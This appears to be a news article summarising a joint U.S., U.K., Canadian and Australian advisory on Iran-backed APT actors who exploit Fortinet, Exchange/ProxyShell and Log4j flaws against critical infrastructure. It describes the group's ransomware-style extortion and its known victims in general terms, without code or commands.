Iran-backed APT actors utilize CVEs to carry out cyber attacks on critical infrastructure

An advisory co-authored by the U.S., U.K., Canada and Australia warns of an Iran-backed APT group utilizing known vulnerabilities to carry out attacks. 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) shared the new Joint Cybersecurity Advisory, co-authored with the National Security Agency (NSA),  Department of Justice (DOJ), U.S. Cyber Command, and Department of the Treasury (DOT), yesterday. The advisory was also written in collaboration with the Australian, Canadian, and British cybersecurity agencies.

In the advisory, the co-authors warn of APT actors based in Iran that are affiliated with the state’s Islamic Revolutionary Guard Corps (IRGC). These actors have been utilizing common vulnerabilities and exposures (CVEs) such as Log4j to carry out malicious cyber activities since early 2021. 

Here's what your security teams needs to know. 

An APT evolves

This new advisory builds off of a November 2021 advisory warning of these same APT actors utilizing Microsoft, Fortinet and ProxyShell vulnerabilities specifically. One of the major developments to come with the new advisory is the co-authors’ firm belief that these same APT actors are backed by the IRGC. This affirmation from these government agencies elevated these APT actors from being just a cybercriminal operation, to them now being a nation-state operation that attacks entities on behalf of the state of Iran. 

Another development cited in the advisory is the increased knowledge of the APT group’s attack methods. It was previously known that these actors were utilizing Fortinet FortiOS and Microsoft Exchange server vulnerabilities to “gain initial access to a broad range of targeted entities in furtherance of malicious activities,” according to the advisory. Also on the government’s radar previously were the group’s use of ProxyShell vulnerabilities. 

Log4j added to the mix

Now, the co-authors assert that in addition to these prior vulnerabilities used, the infamous Log4j vulnerability has now been added to the list of attack methods in this group’s tool box. 

The co-authors believe that the APT group is utilizing all of these vulnerabilities to gain initial access to target environments. After gaining access, the threat actors will then choose a course of action dependent on how they perceive the target’s environment and data. Oftentimes the APT group will use the initial access to carry out malicious activity, such as disk encryption and data extortion that supports ransom operations. 

The APT group has been known to function similarly to a ransomware operation. They will either sell a target’s data, or use double-extortion to both encrypt and steal a target’s data. The APT group then pressures its targets to pay a ransom in order for their data to be decrypted and secured. The advisory does cite several instances in which the APT group utilized BitLocker to move laterally through a target’s network in order to encrypt their data. 

The target: Critical infrastructure

The joint advisory’s co-authors believe that this Iranian-backed APT group has targeted a broad range of victims. The advisory names critical infrastructure entities based in the U.S., U.K, Canada and Australia as a category of the group’s known victims. The advisory does note however that the APT actors are specifically exploiting vulnerabilities on “unprotected networks” instead of targeting specific entities or sectors.  

Four attacks carried out by the APT group are listed in the new advisory. Two of them occurred in December 2021 and utilized PowerShell vulnerabilities on a Microsoft Exchange server to attack a U.S. police department and a U.S. transportation company. The other attacks, which occurred in February 2022, exploited the Log4j vulnerability to gain access to a U.S. municipal government and an American aerospace company. 

The group’s motivations, other than being backed by the IRGC, were not mentioned in the new advisory. All that is known about the APT actors is that they pose as technology companies based in Karaj and Yazd, two Iranian cities. 

The co-authors of this advisory urge organizations, and “especially critical infrastructure organizations,” to utilize the joint advisory’s mitigations list to minimize any risk of compromise by this APT group.